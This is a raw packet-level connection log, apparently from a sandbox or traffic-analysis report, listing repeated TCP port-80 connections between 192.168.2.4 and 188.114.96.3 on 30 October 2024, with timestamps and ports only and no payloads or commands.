                                                        Oct 30, 2024 05:23:42.136483908 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:42.278170109 CET8050088188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:42.324069023 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:42.397085905 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:42.402692080 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:42.402904034 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:42.403038025 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:42.408284903 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:42.762444973 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:42.769918919 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.195297956 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.214874029 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.214937925 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.318422079 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.370923996 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.468959093 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.470339060 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.474773884 CET8050094188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.474838972 CET5009480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.475645065 CET8050100188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.475709915 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.475955009 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.481251001 CET8050100188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:43.829336882 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:43.834670067 CET8050100188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:44.064430952 CET8050100188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:44.105268002 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.369977951 CET8050100188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:44.418710947 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.491677046 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.491677999 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.497019053 CET8050106188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:44.497276068 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.497375011 CET8050100188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:44.497406960 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.497627020 CET5010080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.502639055 CET8050106188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:44.855449915 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:44.860876083 CET8050106188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:45.096415997 CET8050106188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:45.234635115 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.299355030 CET8050106188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:45.363147974 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.425487041 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.426604986 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.431325912 CET8050106188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:45.431421041 CET5010680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.431912899 CET8050112188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:45.431978941 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.432094097 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.437381029 CET8050112188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:45.777308941 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:45.782783031 CET8050112188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.036936045 CET8050112188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.216629028 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.235941887 CET8050112188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.266434908 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.271894932 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.272028923 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.272170067 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.277416945 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.324618101 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.381131887 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.386619091 CET8050119188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.387720108 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.388894081 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.394301891 CET8050119188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.622303963 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.627671957 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.627738953 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.839205027 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.844664097 CET8050119188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.879302025 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:46.936096907 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:46.976316929 CET8050119188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.027117968 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.091000080 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.175275087 CET8050119188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.177612066 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.230247974 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.287977934 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.287983894 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.288059950 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.289124966 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.294603109 CET8050122188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.294627905 CET8050118188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.294681072 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.294708014 CET5011880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.294765949 CET8050112188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.294795036 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.294810057 CET5011280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.294832945 CET8050119188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.294876099 CET5011980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.300076008 CET8050122188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.652358055 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:47.657685041 CET8050122188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.893100977 CET8050122188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:47.949213982 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:48.209214926 CET8050122188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:48.264647961 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:48.336641073 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:48.342067003 CET8050123188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:48.342174053 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:48.342348099 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:48.347620964 CET8050123188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:48.700654030 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:48.706110001 CET8050123188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:48.933506012 CET8050123188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:49.054826021 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.145181894 CET8050123188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:49.324021101 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.647806883 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.650813103 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.654021025 CET8050123188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:49.654095888 CET5012380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.656137943 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:49.656205893 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.657191992 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:49.662514925 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.012635946 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.019364119 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.241987944 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.292774916 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.456001043 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.456022978 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.456185102 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.587105989 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.588634968 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.592871904 CET8050124188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.593400955 CET5012480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.593935966 CET8050125188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.594012022 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.594264984 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.599556923 CET8050125188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:50.949155092 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:50.954557896 CET8050125188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:51.193931103 CET8050125188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:51.322751999 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.400625944 CET8050125188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:51.545100927 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.579399109 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.580085039 CET5012680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.585122108 CET8050125188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:51.585175037 CET5012580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.585556984 CET8050126188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:51.585609913 CET5012680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.585913897 CET5012680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.591270924 CET8050126188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:51.957238913 CET5012680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:51.962627888 CET8050126188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.111658096 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.113667965 CET5012680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.117050886 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.119297028 CET8050126188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.119406939 CET5012680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.119407892 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.121685028 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.126986027 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.336672068 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.342041969 CET8050128188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.342159033 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.348104000 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.353425980 CET8050128188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.480649948 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.486124992 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.486397028 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.704732895 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.710697889 CET8050128188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.715445995 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.764651060 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.918895960 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.941870928 CET8050128188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:52.964647055 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:52.995915890 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.149291039 CET8050128188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:53.199047089 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.273962975 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.273983955 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.275013924 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.279968023 CET8050127188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:53.280028105 CET5012780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.280030012 CET8050128188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:53.280071974 CET5012880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.280318022 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:53.280374050 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.280498981 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.285958052 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:53.636974096 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:53.642491102 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:53.877460957 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.012653112 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.084144115 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.210391045 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.215857983 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.220828056 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.220940113 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.226181030 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.310867071 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.311117887 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.574472904 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.631963968 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.823973894 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.917797089 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.029006958 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.074047089 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.146925926 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.151501894 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.152921915 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.157385111 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.157433033 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.158272982 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.158339977 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.158457041 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.163722992 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.511775017 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.517220020 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.766048908 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.808444977 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.075627089 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.124670029 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.203412056 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.203422070 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.208960056 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.209521055 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.209619045 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.209629059 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.209759951 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.215073109 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.559592009 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.565073013 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.822371006 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.870929003 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.039412022 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.089667082 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.165987968 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.166820049 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.350316048 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.350424051 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.350754023 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.352818966 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.352876902 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.356903076 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.699212074 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.705916882 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.934896946 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.935026884 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.940486908 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.941343069 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.942821980 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.942828894 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.942904949 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.951266050 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.055356026 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.060949087 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.061052084 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.061199903 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.066643953 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.295387983 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.367055893 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.367085934 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.418790102 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.424432993 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.542418003 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.589677095 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.655775070 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.699071884 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.748903990 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.792898893 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.974843025 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.027194977 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.105781078 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.106056929 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.107017994 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.111699104 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.111758947 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.112306118 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.112366915 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.112531900 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.113121986 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.113168955 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.117795944 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.464817047 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.470319986 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.706995964 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.761600018 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.918560028 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.966905117 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.038721085 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.044991970 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.046896935 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.047025919 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.052293062 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.402687073 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.408044100 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.678414106 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.732676029 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.965150118 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:01.011601925 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.720428944 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.721057892 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.727478981 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:01.727540970 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.727544069 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:01.727610111 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.727804899 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.733062983 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.074203968 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.079622030 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.324040890 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.386565924 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.534905910 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.648098946 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.648546934 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.653847933 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.653865099 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.653937101 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.653989077 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.661389112 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.666793108 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.012001991 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.017538071 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.256624937 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.308455944 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.449671984 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.453288078 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.496166945 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.568538904 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.571373940 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.574561119 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.574743032 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.576832056 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.576921940 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.577465057 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.582811117 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.990916014 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.996396065 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.153858900 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.154567957 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.159296989 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.159368992 CET5014180192.168.2.4188.114.96.3
